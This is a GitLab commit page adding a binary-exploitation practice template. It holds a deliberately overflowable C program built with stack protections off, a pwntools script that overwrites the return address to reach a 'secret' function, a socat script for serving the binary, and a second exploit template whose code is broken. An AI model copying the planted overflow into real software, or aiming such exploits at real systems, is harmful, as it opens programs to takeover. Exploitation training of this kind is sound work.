Commit 5264bf46 authored by dex's avatar dex
Browse files

add pwn template and first example

parents
CC=gcc
main: main.c
$(CC) -no-pie -fno-pic -m32 -O0 -fno-stack-protector -o $@ $^
# -no-pie option for linking
# -fno-pic used for compilation
clean:
rm -f main main.o
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void vuln(){
char buf[16];
ssize_t nread = read(STDIN_FILENO, buf, 256);
printf("%i bytes read\n", nread);
}
void secret(){
printf("You won!\n");
exit(0);
}
int main(int argc, char** argv){
printf("Welcome!\n");
printf("Gimme some bytes: ");
fflush(stdout);
vuln();
printf("Thanks. Bye!\n");
return 0;
}
#!/usr/bin/env python
import sys
import os
from pwn import *
### SETUP ###
LOCAL=True
context.log_level = 'info'
#context.log_level = 'debug'
### SPLOIT ###
def sploit():
log.info(p.recvuntil("\n")) # consume until \n
log.info(p.recvuntil(": "))
p.sendline((0x1c+0x4) * "A" + p32(elf.sym["secret"]))
p.interactive()
return
if __name__=="__main__":
elf = ELF("./main")
if LOCAL:
p = process("./main")
"""
p = gdb.debug('./main', '''
b *0x0804850a
c
''')
"""
#gdb.attach(p)
#HOST = "127.0.0.1"
#PORT = 1337
#p = remote(HOST, PORT)
else:
HOST = "192.168.1.123"
PORT = 4242
p = remote(HOST, PORT)
sploit()
"""
0x08048508 <+18>: push 0x0
=> 0x0804850a <+20>: call 0x8048390 <read@plt>
0x0804850f <+25>: add esp,0x10
pwndbg> x/3wx $esp
0xffffcf10: 0x00000000 0xffffcf2c 0x00000100
pwndbg> x/wx $ebp
0xffffcf48: 0xffffcf58
pwndbg> p/x 0xffffcf48-0xffffcf2c
$1 = 0x1c --> buffer base to saved ebp
"""
#!/usr/bin/env bash
usage() { echo "Usage: ${FUNCNAME[1]} $1" && return 0; }
[[ $# -ne 2 ]] && usage "<levelXX> <port>" && exit 1
socat tcp-l:"$2",fork,reuseaddr EXEC:"stdbuf -o0 ./$1"
#socat tcp-l:"$2",fork,reuseaddr EXEC:"strace -v ./$1"
#socat tcp-l:"$2",fork,reuseaddr EXEC:"gdbserver ':1234' ./$1"
#!/usr/bin/env python
import sys
import os
from pwn import *
### SETUP ###
LOCAL=True
context.log_level = 'info'
#context.log_level = 'debug'
### SPLOIT ###
def sploit(addr):
log.info(p.recvuntil("\n")) # consume until \n
p.sendline(512 * "A" + sploit(0xDEADBEEF))
p.interactive()
if __name__=="__main__":
elf = ELF("./exploitme")
if LOCAL:
p = process("./exploitme")
#HOST = "127.0.0.1"
#PORT = 1337
#p = remote(HOST, PORT)
else:
HOST = "192.168.1.123"
PORT = 4242
p = remote(HOST, PORT)
sploit()
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment